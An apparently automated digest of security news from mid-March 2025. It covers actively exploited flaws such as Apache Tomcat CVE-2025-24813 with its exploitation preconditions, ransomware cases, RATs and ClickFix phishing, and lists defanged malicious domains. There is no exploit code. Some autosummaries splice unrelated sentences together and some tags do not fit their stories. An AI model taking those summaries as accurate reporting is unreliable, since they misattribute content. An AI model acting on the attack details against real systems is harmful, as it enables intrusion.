    Critical RCE flaw in Apache Tomcat actively exploited in attacks

    exploits
    2025-03-17 https://www.bleepingcomputer.com/news/security/critical-rce-flaw-in-apache-tomcat-actively-exploited-in-attacks/
    A critical remote code execution (RCE) vulnerability in Apache Tomcat tracked as CVE-2025-24813 is actively exploited in the wild, enabling attackers to take over servers with a simple PUT request. [...] "

    Autosummary: The Tomcat RCE: The CVE-2025-24813 remote code execution vulnerability was first disclosed by Apache on Monday 10, 2025, impacting Apache Tomcat 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0-M1 to 9.0.98. "


    Unpatched Edimax Camera Flaw Exploited for Mirai Botnet Attacks Since Last Year

    exploits
    2025-03-17 https://thehackernews.com/2025/03/unpatched-edimax-camera-flaw-exploited.html
    An unpatched security flaw impacting the Edimax IC-7100 network camera is being exploited by threat actors to deliver Mirai botnet malware variants since at least May 2024. The vulnerability in question is CVE-2025-1316 (CVSS v4 score: 9.3), a critical operating system command injection flaw that an attacker could exploit to achieve remote code execution on susceptible devices by means of a "

    Autosummary: "


    Cybercriminals Exploit CSS to Evade Spam Filters and Track Email Users' Actions

    exploits ciber
    2025-03-17 https://thehackernews.com/2025/03/cybercriminals-exploit-css-to-evade.html
    Malicious actors are exploiting Cascading Style Sheets (CSS), which are used to style and format the layout of web pages, to bypass spam filters and track users' actions. That's according to new findings from Cisco Talos, which said such malicious activities can compromise a victim's security and privacy. "The features available in CSS allow attackers and spammers to track users' actions and "

    Autosummary: "


    ⚡ THN Weekly Recap: Router Hacks, PyPI Attacks, New Ransomware Decryptor, and More

    exploits ransomware
    2025-03-17 https://thehackernews.com/2025/03/thn-weekly-recap-router-hacks-pypi.html
    From sophisticated nation-state campaigns to stealthy malware lurking in unexpected places, this week’s cybersecurity landscape is a reminder that attackers are always evolving. Advanced threat groups are exploiting outdated hardware, abusing legitimate tools for financial fraud, and finding new ways to bypass security defenses. Meanwhile, supply chain threats are on the rise, with open-source "

    Autosummary: This week's list includes — CVE-2025-24983, CVE-2025-24984, CVE-2025-24985, CVE-2025-24991, CVE-2025-24993, CVE-2025-26633 (Microsoft Windows), CVE-2025-24201 (Apple iOS, iPadOS, macOS Sequoia, Safari, and VisionOS), CVE-2025-25291, CVE-2025-25292 (ruby-saml), CVE-2025-27363 (FreeType), CVE-2024-12297 (Moxa PT switches), CVE-2025-27816 (Arctera InfoScale product), CVE-2025-24813 (Apache Tomcat), CVE-2025-27636 (Apache Camel), CVE-2025-27017 (Apache NiFi), CVE-2024-56336 (Siemens SINAMICS S200), CVE-2024-13871, CVE-2024-13872 (Bitdefender BOX v1), CVE-2025-20115 (Cisco IOS XR), CVE-2025-27593 (SICK DL100-2xxxxxxx), CVE-2025-27407 (graphql), CVE-2024-54085 (AMI), CVE-2025-27509 (Fleet), and CVE-2024-57040 (TP-Link TL-WR845N router). It simplifies vulnerability tracking, device health monitoring, security policies, and license management across macOS, Windows, Linux, cloud platforms, and IoT. Fleet is modular and lightweight, integrates smoothly with popular tools, and offers a free, flexible solution tailored to your needs.
Security Flaws in ICONICS Suite Disclosed — Five high-severity security flaws have been disclosed in a Supervisory Control and Data Acquisition (SCADA) system named ICONICS Suite – CVE-2024-1182, CVE-2024-7587, CVE-2024-8299, CVE-2024-9852, and CVE-2024-8300 – that allow an authenticated attacker to execute arbitrary code, elevate privileges, and manipulate critical files. The campaign, ongoing since December 2024, casts a wide geographical net, spanning North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe. The payloads take the form of MSI installers and ELF binaries that are designed to drop the miner that singles out Monero, Sumokoin, ArQma, Graft, Ravencoin, Wownero, Zephyr, Townforge, and YadaCoin. Leveraging direct syscall execution, memory analysis, and syscall hooking detection, ZeroProbe enables stealthy, forensic-friendly security assessments on Windows 10, 11, and Server 2019, compatible across PowerShell versions."
Threat Actors Intensify Abuse of Remote Access Tools — Threat actors like TA583, TA2725, and UAC-0050 are increasingly using legitimate remote monitoring and management (RMM) tools such as ScreenConnect, Fleetdeck, Atera, and Bluetrait as a first-stage payload in email campaigns. While enclave modules have to be signed with a Microsoft-issued certificate to load, a threat actor could rely on an operating system flaw (CVE-2024-49706) to load an unsigned module into an enclave, obtain access to a Trusted Signing entity and sign their own enclaves, or even abuse debuggable and vulnerable enclaves (e.g., CVE-2023-36880) to read and write arbitrary data inside the enclave. ESP32 Chip Backdoor Claims Disputed — Espressif, the manufacturer of ESP32, a low-cost, low-power microcontroller with integrated Wi-Fi and dual-mode Bluetooth capabilities, has pushed back against claims of a backdoor in its products. Three of these packages, acloud-client, enumer-iam, and tcloud-python-test, have been listed as dependencies of a relatively popular GitHub project named accesskey_tools that has been forked 42 times and starred 519 times. "


    SANS Institute Warns of Novel Cloud-Native Ransomware Attacks

    exploits ransomware
    2025-03-17 https://thehackernews.com/2025/03/sans-institute-warns-of-novel-cloud.html
    The latest Palo Alto Networks Unit 42 Cloud Threat Report found that sensitive data is present in 66% of cloud storage buckets. This data is vulnerable to ransomware attacks. The SANS Institute recently reported that these attacks can be performed by abusing the cloud provider’s storage security controls and default settings. “In just the past few months, I have witnessed two different methods for "

    Autosummary: "In just the past few months, I have witnessed two different methods for executing a ransomware attack using nothing but legitimate cloud security features," warns Brandon Evans, security consultant and SANS Certified Instructor. "


    Warning over free online file converters that actually install malware

    exploits
    2025-03-17 https://www.malwarebytes.com/blog/news/2025/03/warning-over-free-online-file-converters-that-actually-install-malware
    The FBI has warned about free file converters that are up to no good and can lead to ransomware and identity theft. "

    Autosummary: Imageconvertors[.]com (Phishing) convertitoremp3[.]it (Riskware) convertisseurs-pdf[.]com (Riskware) convertscloud[.]com (Phishing) convertix-api[.]xyz (Trojan) convertallfiles[.]com (Adware) freejpgtopdfconverter[.]com (Riskware) primeconvertapp[.]com (Riskware) 9convert[.]com (Riskware) Convertpro[.]org (Riskware) "


    Apache Tomcat Vulnerability Actively Exploited Just 30 Hours After Public Disclosure

    exploits
    2025-03-17 https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html
    A recently disclosed security flaw impacting Apache Tomcat has come under active exploitation in the wild following the release of a public proof-of-concept (PoC) a mere 30 hours after public disclosure. The vulnerability, tracked as CVE-2025-24813, affects the below versions: Apache Tomcat 11.0.0-M1 to 11.0.2, Apache Tomcat 10.1.0-M1 to 10.1.34, and Apache Tomcat 9.0.0-M1 to 9.0.98. It concerns a "

    Autosummary: The vulnerability, tracked as CVE-2025-24813, affects the below versions:
    - Apache Tomcat 11.0.0-M1 to 11.0.2
    - Apache Tomcat 10.1.0-M1 to 10.1.34
    - Apache Tomcat 9.0.0-M1 to 9.0.98
    It concerns a case of remote code execution or information disclosure when specific conditions are met:
    - Writes enabled for the default servlet (disabled by default) "


    Attackers use CSS to create evasive phishing messages

    financial
    2025-03-17 https://securityaffairs.com/175512/security/attackers-use-css-to-create-evasive-phishing-messages.html
    Threat actors exploit Cascading Style Sheets (CSS) to bypass spam filters and detection engines, and track users’ actions and preferences.  Cisco Talos observed threat actors abusing Cascading Style Sheets (CSS) to evade detection and track user behavior, raising security and privacy concerns, including potential fingerprinting. Cascading Style Sheets (CSS) is a stylesheet language used to […] "

    Autosummary: Pierluigi Paganini, March 17, 2025. Note that this preheader text is kept hidden by relying on multiple CSS properties, including color, height, max-height, and max-width. "


    Researcher releases free GPU-Based decryptor for Linux Akira ransomware

    exploits ransomware Linux
    2025-03-17 https://securityaffairs.com/175494/malware/free-decryptor-linux-akira-ransomware-brute-force.html
    A researcher released a free decryptor for Linux Akira ransomware, using GPU power to recover keys through brute force. Security researcher Yohanes Nugroho created a free decryptor for Linux Akira ransomware, using GPUs to brute force the decryption keys. Initially estimating a week, the project took three weeks and cost $1,200 in GPU resources due […] "

    Autosummary: Pierluigi Paganini, March 17, 2025. The researcher analyzed log files, file metadata, and hardware benchmarks to estimate encryption timestamps, making brute-forcing decryption keys more efficient. "


    BlackLock ransomware claims nearly 50 attacks in two months

    exploits ransomware
    2025-03-17 https://www.bleepingcomputer.com/news/security/blacklock-ransomware-claims-nearly-50-attacks-in-two-months/
    A ransomware-as-a-service (RaaS) operation called "BlackLock" has emerged as one of the more active ransomware operations of 2025. [...] "

    Autosummary: "


    Telegram CEO leaves France temporarily as criminal probe continues

    ransomware
    2025-03-17 https://www.bleepingcomputer.com/news/security/telegram-ceo-leaves-france-temporarily-as-criminal-probe-continues/
    French authorities have allowed Pavel Durov, Telegram's CEO and founder, to temporarily leave the country while criminal activity on the messaging platform is still under investigation. [...] "

    Autosummary: "I want to thank the investigative judges for letting this happen, as well as my lawyers and team for their relentless efforts in demonstrating that, when it comes to moderation, cooperation, and fighting crime, for years Telegram not only met but exceeded its legal obligations. "


    Microsoft: New RAT malware used for crypto theft, reconnaissance

    exploits
    2025-03-17 https://www.bleepingcomputer.com/news/security/microsoft-new-rat-malware-used-for-crypto-theft-reconnaissance/
    Microsoft has discovered a new remote access trojan (RAT) that employs "sophisticated techniques" to avoid detection, maintain persistence, and extract sensitive data. [...] "

    Autosummary: After being deployed on compromised systems, attackers can use StilachiRAT to siphon digital wallet data by scanning the configuration information of 20 cryptocurrency wallet extensions, including Coinbase Wallet, Phantom, Trust Wallet, Metamask, OKX Wallet, Bitget Wallet, and others. "


    Threat actors rapidly exploit new Apache Tomcat flaw following PoC release

    exploits
    2025-03-17 https://securityaffairs.com/175522/security/threat-actors-rapidly-exploit-new-apache-tomcat-flaw-following-poc-release.html
    Threat actors began exploiting a recently disclosed Apache Tomcat vulnerability immediately after the release of a PoC exploit code. A newly disclosed Apache Tomcat vulnerability, tracked as CVE-2025-24813, is being actively exploited just 30 hours after a public PoC was released. The issue is a path equivalence flaw in Apache Tomcat that allows remote code execution […] "

    Autosummary: “If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:
    - writes enabled for the default servlet (disabled by default)
    - support for partial PUT (enabled by default)
    - a target URL for security sensitive uploads that is a sub-directory of a target URL for public uploads
    - attacker knowledge of the names of security sensitive files being uploaded
    - the security sensitive files also being uploaded via partial PUT
    If all of the following were true, a malicious user was able to perform remote code execution:
    - writes enabled for the default servlet (disabled by default)
    - support for partial PUT (enabled by default) "


    Week in review: NIST selects HQC for post-quantum encryption, 10 classic cybersecurity books

    ciber
    2025-03-16 https://www.helpnetsecurity.com/2025/03/16/week-in-review-nist-selects-hqc-for-post-quantum-encryption-10-classic-cybersecurity-books/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: NIST selects HQC as backup algorithm for post-quantum encryption Last year, NIST standardized a set of encryption algorithms that can keep data secure from a cyberattack by a future quantum computer. Now, NIST has selected a backup algorithm that can provide a second line of defense for the task of general encryption, which safeguards internet traffic and stored data alike. … More

    The post Week in review: NIST selects HQC for post-quantum encryption, 10 classic cybersecurity books appeared first on Help Net Security.

    "

    Autosummary: Hetty: Open-source HTTP toolkit for security research Hetty is an open-source HTTP toolkit designed for security research, offering a free alternative to commercial tools like Burp Suite Pro. Defending against EDR bypass attacks In this Help Net Security video, John Dwyer, Director of Security Research at Binary Defense, discusses how over-reliance on EDR and lack of monitoring EDR telemetry health has become a risk in corporate security, the evolving tools and techniques attackers are using, and key mistakes companies are making when it comes to their EDR. New infosec products of the week: March 14, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Alloy, Detectify, Pondurance, and SimSpace. "


    A ransomware attack hit the Micronesian state of Yap, causing the health system network to go down.

    exploits government ransomware
    2025-03-16 https://securityaffairs.com/175445/cyber-crime/a-ransomware-attack-hit-the-micronesian-state-of-yap.html
    A Micronesian state suffered a ransomware attack and was forced to shut down all computers of its government health agency. A state in Micronesia, the state of Yap, suffered a ransomware attack, forcing the shutdown of all computers in its government health agency. Yap is one of the four states of the Federated States of […] "

    Autosummary: On March 11, 2025, Yap’s Health Department detected a ransomware attack, shutting down its network and digital health systems to contain the threat. "


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 37

    exploits
    2025-03-16 https://securityaffairs.com/175472/malware/security-affairs-malware-newsletter-round-37.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Undercover miner: how YouTubers get pressed into distributing SilentCryptoMiner as a restriction bypass tool; Ragnar Loader; Desert Dexter. Attacks on Middle Eastern countries; Ballista – New IoT Botnet Targeting Thousands of TP-Link Archer Routers; Microsoft patches […] "

    Autosummary: "


    Denmark warns of increased state-sponsored campaigns targeting the European telcos

    government Telcos
    2025-03-16 https://securityaffairs.com/175479/intelligence/denmark-warns-of-increased-state-sponsored-campaigns-targeting-the-european-telcos.html
    Denmark's cybersecurity agency warns of increased state-sponsored campaigns targeting European telecom companies. Denmark raised the cyber espionage threat level for its telecom sector from medium to high due to rising threats across Europe. The Danish Social Security Agency published a new threat assessment for the cyber threat to the telecommunications sector that highlights […] "

    Autosummary: Pierluigi Paganini, March 16, 2025. The Danish telecom sector faces multiple cyber threats: espionage, destructive attacks (MEDIUM), cyber activism (HIGH), and criminal hackers (VERY HIGH), including ransomware. In February 2025, Cisco Talos researchers reported that China-linked APT group Salt Typhoon uses a custom-built utility, dubbed JumbledPath, to spy on network traffic of U.S. telecommunication providers. "


    Search continues in Dominican Republic for missing student Sudiksha Konanki

    ransomware
    2025-03-15 https://www.bbc.com/news/articles/c5y9vlq4dlzo
    The search for the missing University of Pittsburgh student, who was on spring break in Punta Cana, is entering its second week. "

    Autosummary: The University of Pittsburgh, where Ms Konanki is a student, said in a statement they are working with the Federal Bureau of Investigation, the Drug Enforcement Administration, Department of Homeland Security and local authorities in response to her disappearance. Rachel Looker, BBC News, Washington DC. Defensa Civil Dominicana. Search efforts for a missing University of Pittsburgh student who disappeared on spring break while in the Dominican Republic have entered their second week. "


    New Akira ransomware decryptor cracks encryptions keys using GPUs

    exploits ransomware
    2025-03-15 https://www.bleepingcomputer.com/news/security/gpu-powered-akira-ransomware-decryptor-released-on-github/
    Security researcher Yohanes Nugroho has released a decryptor for the Linux variant of Akira ransomware, which utilizes GPU power to retrieve the decryption key and unlock files for free. [...] "

    Autosummary: As always, when attempting to decrypt files, make a backup of the original encrypted files, as there's a possibility that files can be corrupted if the wrong decryption key is used. "


    U.S. CISA adds Apple products and Juniper Junos OS flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-03-14 https://securityaffairs.com/175381/security/u-s-cisa-adds-apple-juniper-junos-os-flaws-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple products and Juniper Junos OS flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2025-21590 is an Improper Isolation or Compartmentalization issue in the kernel of Juniper Networks Junos OS […] "

    Autosummary: The flaw impacts iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later, Macs running macOS Sequoia, and Apple Vision Pro. Apple did not disclose details about the attacks or attribute them to any threat actor. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:
    - CVE-2025-21590 Juniper Junos OS Improper Isolation or Compartmentalization Vulnerability
    - CVE-2025-24201 Apple Multiple Products WebKit Out-of-Bounds Write Vulnerability
    The vulnerability CVE-2025-21590 is an Improper Isolation or Compartmentalization issue in the kernel of Juniper Networks Junos OS that allows a local attacker with high privileges to compromise the integrity of the device. "


    New MassJacker Malware Targets Piracy Users, Hijacking Cryptocurrency Transactions

    exploits
    2025-03-14 https://thehackernews.com/2025/03/new-massjacker-malware-targets-piracy.html
    Users searching for pirated software are the target of a new malware campaign that delivers a previously undocumented clipper malware called MassJacker, according to findings from CyberArk. Clipper malware is a type of cryware (as coined by Microsoft) that's designed to monitor a victim's clipboard content and facilitate cryptocurrency theft by substituting copied cryptocurrency wallet addresses "

    Autosummary: The binary, codenamed PackerE, is responsible for downloading an encrypted DLL, which, in turn, loads a second DLL file that launches the MassJacker payload by injecting it into a legitimate Windows process called "InstallUtil.exe". "


    OBSCURE#BAT Malware Uses Fake CAPTCHA Pages to Deploy Rootkit r77 and Evade Detection

    exploits
    2025-03-14 https://thehackernews.com/2025/03/obscurebat-malware-uses-fake-captcha.html
    A new malware campaign has been observed leveraging social engineering tactics to deliver an open-source rootkit called r77. The activity, codenamed OBSCURE#BAT by Securonix, enables threat actors to establish persistence and evade detection on compromised systems. It's currently not known who is behind the campaign. The rootkit "has the ability to cloak or mask any file, registry key or task "

    Autosummary: "OBSCURE#BAT demonstrates a highly evasive attack chain, leveraging obfuscation, stealth techniques, and API hooking to persist on compromised systems while evading detection," the researchers said. "


    Live Ransomware Demo: See How Hackers Breach Networks and Demand a Ransom

    exploits ransomware
    2025-03-14 https://thehackernews.com/2025/03/live-ransomware-demo-see-how-hackers.html
    Cyber threats evolve daily. In this live webinar, learn exactly how ransomware attacks unfold—from the initial breach to the moment hackers demand payment. Join Joseph Carson, Delinea’s Chief Security Scientist and Advisory CISO, who brings 25 years of enterprise security expertise. Through a live demonstration, he will break down every technical step of a ransomware attack, showing you how "

    Autosummary: Through a live demonstration, he will break down every technical step of a ransomware attack, showing you how hackers exploit vulnerabilities and encrypt data—in clear, simple language. "


    SuperBlack Ransomware operators exploit Fortinet Firewall flaws in recent attacks

    exploits ransomware
    2025-03-14 https://securityaffairs.com/175402/cyber-crime/superblack-ransomware-exploited-fortinet-firewall-flaws.html
    Operators behind the SuperBlack ransomware exploited two vulnerabilities in Fortinet firewalls for recent attacks. Between January and March, researchers at Forescout Research – Vedere Labs observed a threat actor exploiting two Fortinet vulnerabilities to deploy the SuperBlack ransomware. The experts attribute the attacks to a threat actor named “Mora_001”, which uses Russian-language artifacts and exhibits […] "

    Autosummary: The activity could be spotted by analyzing logs where it appears as jsconsole(IP), with the IP address often spoofed as 127.0.0.1, 13.73.13.73, 8.8.8.8, 1.1.1.1, or other recognizable addresses: attackers exploit the WebSocket vulnerability via the jsconsole interface. Although Mora_001 is tracked as an independent threat actor, it exhibits consistent post-exploitation tactics, including identical usernames across victims, overlapping IPs, and rapid ransomware deployment within 48 hours. "


    Ransomware gang creates tool to automate VPN brute-force attacks

    exploits
    2025-03-14 https://www.bleepingcomputer.com/news/security/black-basta-ransomware-creates-automated-tool-to-brute-force-vpns/
    The Black Basta ransomware operation created an automated brute-forcing framework dubbed "BRUTED" to breach edge networking devices like firewalls and VPNs. [...] "

    Autosummary: Analysis of the source code indicates that the framework was specifically designed to brute-force credentials on the following VPN and remote-access products: SonicWall NetExtender, Palo Alto GlobalProtect, Cisco AnyConnect, Fortinet SSL VPN, Citrix NetScaler (Citrix Gateway), Microsoft RDWeb (Remote Desktop Web Access), and WatchGuard SSL VPN. "


    Cisco IOS XR vulnerability lets attackers crash BGP on routers

    exploits
    2025-03-14 https://www.bleepingcomputer.com/news/security/cisco-vulnerability-lets-attackers-crash-bgp-on-ios-xr-routers/
    Cisco has patched a denial of service (DoS) vulnerability that lets attackers crash the Border Gateway Protocol (BGP) process on IOS XR routers with a single BGP update message. [...] "

    Autosummary: IOS XR runs on the company's carrier-grade Network Convergence System (NCS) and Carrier Routing System (CRS) series of routers, such as the ASR 9000, NCS 5500, and 8000 series. "


    Suspected LockBit ransomware dev extradited to United States

    exploits government ransomware
    2025-03-14 https://www.bleepingcomputer.com/news/security/suspected-lockbit-ransomware-dev-extradited-to-united-states/
    A dual Russian-Israeli national, suspected of being a key developer for the LockBit ransomware operation, has been extradited to the United States to face charges. [...] "

    Autosummary: Other prominent LockBit members who have been charged in the U.S. include Mikhail Vasiliev (awaiting sentencing), Ruslan Astamirov (awaiting sentencing), Artur Sungatov (wanted), Ivan Kondratyev (wanted), and Mikhail Matveev (wanted). "


    Alleged Israeli LockBit Developer Rostislav Panev Extradited to U.S. for Cybercrime Charges

    ransomware
    2025-03-14 https://thehackernews.com/2025/03/alleged-israeli-lockbit-developer.html
    A 51-year-old dual Russian and Israeli national who is alleged to be a developer of the LockBit ransomware group has been extradited to the United States, nearly three months after he was formally charged in connection with the e-crime scheme. Rostislav Panev was previously arrested in Israel in August 2024. He is said to have been working as a developer for the ransomware gang from 2019 "

    Autosummary: "


    LockBit ransomware developer Rostislav Panev was extradited from Israel to the U.S.

    exploits ransomware
    2025-03-14 https://securityaffairs.com/175413/cyber-crime/lockbit-ransomware-developer-rostislav-panev-extradited-to-us.html
    The US Justice Department announced that the LockBit ransomware developer Rostislav Panev was extradited from Israel to the U.S. The US Justice Department announced that one of the LockBit ransomware developers, Rostislav Panev (51), has been extradited to the United States. The dual Russian-Israeli national was arrested in Israel in 2024 and faces charges related […] "

    Autosummary: “As alleged in the superseding complaint, at the time of Panev’s arrest in Israel in August, law enforcement discovered on Panev’s computer administrator credentials for an online repository that was hosted on the dark web and stored source code for multiple versions of the LockBit builder, which allowed LockBit’s affiliates to generate custom builds of the LockBit ransomware malware for particular victims. "


    Coinbase phishing email tricks users with fake wallet migration

    financial
    2025-03-14 https://www.bleepingcomputer.com/news/security/coinbase-phishing-email-tricks-users-with-fake-wallet-migration/
    A large-scale Coinbase phishing attack poses as a mandatory wallet migration, tricking recipients into setting up a new wallet with a pre-generated recovery phrase controlled by attackers. [...] "

    Autosummary: As the email appears to have been sent directly through SendGrid and what appears to be Akamai's account, it passes the SPF, DMARC, and DKIM email security checks, bypassing spam filters on many accounts. "Reminder: Beware of recovery phrase scams," Coinbase posted on X. "We're aware of new phishing emails going around pretending to be Coinbase and Coinbase Wallet. "


    Cybersecurity classics: 10 books that shaped the industry

    industry ciber
    2025-03-13 https://www.helpnetsecurity.com/2025/03/13/cybersecurity-classics-books/

    Cybersecurity constantly evolves, but some books have stood the test of time, shaping how professionals think about security, risk, and digital threats. Whether you’re a CISO, a seasoned expert, or a cybersecurity enthusiast, these must-reads belong on your shelf. Masters of Deception: The Gang That Ruled Cyberspace Author: Michele Slatalla Set against the backdrop of the 1990 AT&T phone network crash, Masters of Deception chronicles an important moment in hacker history: law enforcement cracked down on … More

    The post Cybersecurity classics: 10 books that shaped the industry appeared first on Help Net Security.

    "

    Autosummary: Through meticulous research and firsthand interviews, Krebs unravels the rise of digital crime syndicates that flood inboxes with fraudulent pharmacy ads, malware, and phishing schemes—operations that steal identities, drain bank accounts, and even endanger lives. Author: Kim Zetter In Countdown to Zero Day, journalist Kim Zetter unravels the gripping story of Stuxnet, the world’s first true cyberweapon, a sophisticated piece of malware designed not just to steal data but to cause real-world destruction. "


    Cybersecurity jobs available right now in Europe: March 13, 2025

    ciber
    2025-03-13 https://www.helpnetsecurity.com/2025/03/13/cybersecurity-jobs-available-right-now-in-europe-march-13-2025/

    Cloud Security Engineer TUI Group | Portugal | Hybrid – View job details As a Cloud Security Engineer, you will contribute to the implementation of security solutions and will work alongside our Security Operations team to ensure appropriate controls are engineered, addressing the technical requirements of our global business. You will support the implementation and maintenance of identity protection, threat detection, and email security solutions across the Microsoft 365 environment. Cybersecurity Architect ExpressVPN | Poland | … More

    The post Cybersecurity jobs available right now in Europe: March 13, 2025 appeared first on Help Net Security.

    "

    Autosummary: Senior Enterprise IT and OT Security Architect Volvo Group | Sweden | On-site – View job details As a Senior Enterprise IT and OT Security Architect, you will develop security architectural frameworks and blueprints that guide the design, development, and implementation of secure infrastructure, encompassing data protection, authentication, authorization, encryption, and allied security measures. Security Architect (SIEM) EPAM Systems | Latvia | Remote – View job details As a Security Architect (SIEM), you will lead the design, deployment, and configuration of SIEM solutions, ensuring seamless integration with various security tools, systems, and log sources. Cybersecurity Architect ExpressVPN | Poland | Hybrid – View job details As a Cybersecurity Architect, you will plan, implement, manage, monitor and upgrade security measures/architectures for the protection of the organization’s data, systems, and networks. SecOps Engineer Showpad | Romania | Hybrid – View job details As a SecOps Engineer, you will monitor and respond to security events involving vulnerabilities, endpoints, user behavior analytics, firewalls, IDS/IPS, and external threat intelligence. "


    Meta Warns of FreeType Vulnerability (CVE-2025-27363) With Active Exploitation Risk

    exploits
    2025-03-13 https://thehackernews.com/2025/03/meta-warns-of-freetype-vulnerability.html
    Meta has warned that a security vulnerability impacting the FreeType open-source font rendering library may have been exploited in the wild. The vulnerability has been assigned the CVE identifier CVE-2025-27363, and carries a CVSS score of 8.1, indicating high severity. Described as an out-of-bounds write flaw, it could be exploited to achieve remote code execution when parsing certain font "

    Autosummary: "


    Medusa ransomware hit over 300 critical infrastructure organizations until February 2025

    exploits ransomware
    2025-03-13 https://securityaffairs.com/175319/cyber-crime/medusa-ransomware-hit-over-300-critical-infrastructure-organizations-until-february-2025.html
    The Medusa ransomware operation hit over 300 organizations in critical infrastructure sectors in the United States until February 2025. The FBI, CISA, and MS-ISAC have issued a joint advisory detailing Medusa ransomware tactics, techniques, and indicators of compromise (IOCs) based on FBI investigations as recent as February 2025. This advisory is part of the #StopRansomware […] "

    Autosummary: “As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing,” reads the joint advisory. The FBI, CISA, and MS-ISAC have issued a joint advisory detailing Medusa ransomware tactics, techniques, and indicators of compromise (IOCs) based on FBI investigations as recent as February 2025. "


    Medusa ransomware: FBI and CISA urge organisations to act now to mitigate threat

    exploits ransomware
    2025-03-13 https://www.tripwire.com/state-of-security/medusa-ransomware-fbi-and-cisa-urge-organizations-act-now-mitigate-threat
    The Medusa ransomware gang continues to present a major threat to the critical infrastructure sector, according to a newly-released advisory - with at least one organisation hit with a "triple-extortion" threat. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: As of February 2025, the Medusa ransomware operation, which we have previously detailed on the Tripwire State of Security blog, had hit over 300 organisations from a variety of critical infrastructure sectors with affected industries including education, health, legal, insurance, technology, and manufacturing. "


    Future-Proofing Business Continuity: BCDR Trends and Challenges for 2025

    ransomware
    2025-03-13 https://thehackernews.com/2025/03/bcdr-2025-trends-and-challenges-for-msps-and-it-teams.html
    As IT environments grow more complex, IT professionals are facing unprecedented pressure to secure business-critical data. With hybrid work the new standard and cloud adoption on the rise, data is increasingly distributed across different environments, providers and locations, expanding the attack surface for emerging cyberthreats. While the need for a strong data protection strategy has become "

    Autosummary: The backup paradox: Essential yet increasingly unreliable. Data backup and recovery should be a safety net for businesses, but for many, it has become a source of frustration, complexity and risk. The lessons learned: What IT leaders must prioritize now. The State of Backup and Recovery Report 2025 reveals that critical security gaps remain while securing on-premises, cloud, endpoint and SaaS data. Notably, SaaS platforms now serve as the backbone of daily business operations, but without the right backup strategies, this data remains vulnerable. Alarmingly, more than 10% of businesses don't even know how long it would take to recover their business-critical SaaS data, if they could recover it at all. With hybrid work the new standard and cloud adoption on the rise, data is increasingly distributed across different environments, providers and locations, expanding the attack surface for emerging cyberthreats. To help IT teams and managed service providers (MSPs) understand how their peers are navigating these challenges, the State of Backup and Recovery Report 2025 has gathered insights from more than 3,000 IT professionals, security experts and administrators worldwide. "


    Meta warns of actively exploited flaw in FreeType library

    exploits
    2025-03-13 https://securityaffairs.com/175337/hacking/meta-warned-actively-exploited-cve-2025-27363.html
    Meta warned that a vulnerability, tracked as CVE-2025-27363, impacting the FreeType library may have been exploited in the wild. Meta warned that an out-of-bounds write flaw, tracked as CVE-2025-27363 (CVSS score of 8.1), in the FreeType library may have been actively exploited in attacks. “An out of bounds write exists in FreeType versions 2.13.0 and below when attempting to […] "

    Autosummary: "


    Catholics mark Pope's 12th anniversary with prayers for his recovery

    industry
    2025-03-13 https://www.bbc.com/news/articles/cy0d599479do
    Pope Francis, who was elected on 13 March 2013, has been in hospital for the past month and has been improving in recent days. "

    Autosummary: Bethany Bell and Gillian Hazell, BBC News, reporting from Rome. Arianna, a student from Piacenza in Italy, said she had been "really concerned" about the Pope's health. Catholics around the world are marking the 12th anniversary of Pope Francis's election as pontiff by praying for his recovery. "


    Juniper patches bug that let Chinese cyberspies backdoor routers

    exploits
    2025-03-13 https://www.bleepingcomputer.com/news/security/juniper-patches-bug-that-let-chinese-cyberspies-backdoor-routers-since-mid-2024/
    Juniper Networks has released emergency security updates to patch a Junos OS vulnerability exploited by Chinese hackers to backdoor routers for stealthy access. [...] "

    Autosummary: The vulnerability impacts NFX-Series, Virtual SRX, SRX-Series Branch, SRX-Series HE, EX-Series, QFX-Series, ACX, and MX-Series devices and was resolved in 21.4R3-S10, 22.2R3-S6, 22.4R3-S6, 23.2R2-S3, 24.2R1-S2, 24.2R2, 24.4R1, and all subsequent releases. "


    Microsoft Warns of ClickFix Phishing Campaign Targeting Hospitality Sector via Fake Booking[.]com Emails

    financial
    2025-03-13 https://thehackernews.com/2025/03/microsoft-warns-of-clickfix-phishing.html
    Microsoft has shed light on an ongoing phishing campaign that targeted the hospitality sector by impersonating online travel agency Booking.com using an increasingly popular social engineering technique called ClickFix to deliver credential-stealing malware. The activity, the tech giant said, started in December 2024 and operates with the end goal of conducting financial fraud and theft. It's "

    Autosummary: "This phishing attack specifically targets individuals in hospitality organizations in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe, that are most likely to work with Booking.com, sending fake emails purporting to be coming from the agency," Microsoft said in a report shared with The Hacker News. The command, in a nutshell, uses the legitimate mshta.exe binary to drop the next-stage payload, which comprises various commodity malware families like XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. "


    North Korea’s ScarCruft Deploys KoSpy Malware, Spying on Android Users via Fake Utility Apps

    exploits
    2025-03-13 https://thehackernews.com/2025/03/north-koreas-scarcruft-deploys-kospy.html
